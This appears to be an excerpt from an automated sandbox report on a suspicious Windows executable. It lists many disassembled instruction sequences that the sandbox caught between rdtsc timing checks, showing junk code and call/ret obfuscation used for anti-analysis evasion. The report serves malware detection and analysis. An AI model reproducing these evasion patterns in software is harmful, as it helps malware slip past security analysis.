                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB4B7 second address: 10DB4C1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB4C1 second address: 10DB4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBBA93ED2A6h 0x0000000b jmp 00007FBBA93ED2A4h 0x00000010 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB7A6 second address: 10DB7C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBA8502AB6h 0x00000008 jl 00007FBBA8502AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FBBA8502ABCh 0x00000015 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB7C2 second address: 10DB7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 ja 00007FBBA93ED29Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DB915 second address: 10DB91B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC323 second address: 10DC329 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC329 second address: 10DC332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DC332 second address: 10DC338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DEB6A second address: 10DEB9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBBA8502AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FBBA8502ABFh 0x00000011 jng 00007FBBA8502AB6h 0x00000017 js 00007FBBA8502AB6h 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10DEB9C second address: 10DEBA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A3691 second address: 10A3696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10A3696 second address: 10A36A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ch 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E4355 second address: 10E4372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E4372 second address: 10E4378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E483E second address: 10E4871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBBA8502AC2h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBBA8502AC8h 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E4871 second address: 10E487B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FBBA93ED296h 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E487B second address: 10E487F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E487F second address: 10E48A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBBA93ED2A4h 0x00000013 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48A1 second address: 10E48B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48B3 second address: 10E48B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48B9 second address: 10E48CE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA8502AB8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E48CE second address: 10E48D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E389F second address: 10E38A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E38A4 second address: 10E38A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E49B5 second address: 10E49C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E49C1 second address: 10E49D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E49D1 second address: 10E49D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B278A second address: 10B27A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A2h 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10B27A0 second address: 10B27B4 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBBA8502AB6h 0x00000008 ja 00007FBBA8502AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E792B second address: 10E7934 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7934 second address: 10E7940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBBA8502AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7C20 second address: 10E7C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A3h 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7C37 second address: 10E7C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FBBA8502ABEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7DBA second address: 10E7DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED2A9h 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E7DD7 second address: 10E7DDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9AEB second address: 10E9AF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FBBA93ED29Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9AF9 second address: 10E9B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 0FC3DEF0h 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FBBA8502AB8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov esi, 6598B71Dh 0x0000002b push 9FC84B45h 0x00000030 js 00007FBBA8502AD0h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9C84 second address: 10E9C8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9C8A second address: 10E9C94 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10E9E35 second address: 10E9E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EA017 second address: 10EA01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EAACC second address: 10EAAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EB03C second address: 10EB088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f jp 00007FBBA8502ABCh 0x00000015 popad 0x00000016 nop 0x00000017 mov di, 2A68h 0x0000001b mov dword ptr [ebp+122D2ABFh], ecx 0x00000021 push 00000000h 0x00000023 jne 00007FBBA8502AB6h 0x00000029 push 00000000h 0x0000002b add edi, dword ptr [ebp+122D3593h] 0x00000031 xchg eax, ebx 0x00000032 push ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ECBFD second address: 10ECC32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FBBA93ED29Fh 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FBBA93ED298h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ED6F3 second address: 10ED6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ED6F7 second address: 10ED6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10ED6FB second address: 10ED705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EDF84 second address: 10EDFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBBA93ED2A2h 0x00000008 jmp 00007FBBA93ED2A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FBBA93ED298h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push 00000000h 0x00000031 add dword ptr [ebp+1247543Bh], ebx 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EDFE6 second address: 10EDFEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EDFEA second address: 10EDFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10EEB87 second address: 10EEB91 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F6C49 second address: 10F6C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBBA93ED296h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F7AB4 second address: 10F7ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F7ABD second address: 10F7B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED29Dh 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e add dword ptr [ebp+122D2DA4h], esi 0x00000014 js 00007FBBA93ED29Ch 0x0000001a mov ebx, dword ptr [ebp+1245052Ch] 0x00000020 push 00000000h 0x00000022 add bl, 00000070h 0x00000025 push 00000000h 0x00000027 jng 00007FBBA93ED297h 0x0000002d stc 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBBA93ED2A9h 0x00000036 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FAADB second address: 10FAADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FBC47 second address: 10FBC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA0B second address: 10FDA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA0F second address: 10FDA19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA19 second address: 10FDA1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA1D second address: 10FDA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D1EDCh] 0x00000010 sub ebx, 021EFC83h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 mov ebx, 40F721A1h 0x0000001e pop edi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FBBA93ED298h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov edi, dword ptr [ebp+1247D5B7h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FBBA93ED29Dh 0x00000049 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FDA79 second address: 10FDA83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBA8502ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100DDF second address: 1100DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100DE5 second address: 1100E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007FBBA8502AB6h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FBBA8502AB8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b add dword ptr [ebp+1247E700h], esi 0x00000031 push 00000000h 0x00000033 je 00007FBBA8502AB8h 0x00000039 mov edi, edx 0x0000003b mov dword ptr [ebp+122D316Bh], esi 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007FBBA8502AB8h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 0000001Ah 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d mov dword ptr [ebp+12463030h], edi 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push edi 0x00000067 pushad 0x00000068 popad 0x00000069 pop edi 0x0000006a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100E61 second address: 1100E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1100E67 second address: 1100E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1101F63 second address: 1101FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop esi 0x0000000f jnc 00007FBBA93ED298h 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FBBA93ED2A8h 0x0000001c push 00000000h 0x0000001e or dword ptr [ebp+124520C8h], edi 0x00000024 push 00000000h 0x00000026 mov edi, dword ptr [ebp+1244F634h] 0x0000002c xchg eax, esi 0x0000002d jmp 00007FBBA93ED29Ch 0x00000032 push eax 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1102EAB second address: 1102F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA8502AC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FBBA8502AC0h 0x0000000f nop 0x00000010 mov edi, ebx 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+122D2AD0h], edi 0x0000001a mov bx, ax 0x0000001d push 00000000h 0x0000001f jmp 00007FBBA8502AC1h 0x00000024 pushad 0x00000025 jnc 00007FBBA8502ABCh 0x0000002b popad 0x0000002c xchg eax, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FBBA8502AC0h 0x00000036 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1102F1A second address: 1102F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1102F31 second address: 1102F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBBA8502ABDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FBBA8502AB6h 0x00000018 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 1102F51 second address: 1102F57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F6DEA second address: 10F6DF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F6DF1 second address: 10F6E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FBBA93ED298h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov bx, F2A0h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov edi, dword ptr [ebp+122D380Fh] 0x00000035 mov edi, 08663DB3h 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007FBBA93ED298h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov dword ptr [ebp+122D3580h], edi 0x00000061 mov eax, dword ptr [ebp+122D05D5h] 0x00000067 mov di, ax 0x0000006a push FFFFFFFFh 0x0000006c or dword ptr [ebp+122D2FD0h], edi 0x00000072 nop 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FBBA93ED2A8h 0x0000007a rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F7C07 second address: 10F7C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10F8C32 second address: 10F8C44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 10FAC24 second address: 10FAC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Documents\EBFBFBFIIJ.exeRDTSC instruction interceptor: First address: 110C56A second address: 110C594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBBA93ED2A6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
